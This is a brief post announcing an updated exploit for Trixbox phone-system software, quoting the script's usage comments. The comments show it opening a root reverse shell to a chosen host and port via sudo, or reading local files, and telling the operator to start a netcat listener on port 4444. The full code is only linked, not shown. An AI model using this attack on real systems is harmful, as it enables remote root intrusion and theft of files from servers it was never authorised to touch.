New Trixbox Exploit released by Jean-Michel Besnard.. now with root shell!

# Jean-Michel BESNARD <jmbesnard@gmail.com> / LEXSI Audit
# 2008-07-09
# This is an update of the previous exploit. We can now get a root shell, thanks to sudo.
#
# perl trixbox_fi_v2.pl 192.168.1.212
# Please listen carefully as our menu option has changed
# Choose from the following options:
# 1> Remote TCP shell
# 2> Read local file
# 1
# Host and port the reverse shell should connect to ? (<host>:<port>): 192.168.1.132:4444
# Which uid would you like for your shell ? (uid=root will be OK on most recent trixbox versions only): [root|asterisk]
# root
# Make sure you've opened a server socket on port 4444 at 192.168.1.132 (e.g, nc -l -p 4444)
# Press enter to continue...
# done...

More info, and complete code here: http://www.milw0rm.com/exploits/6026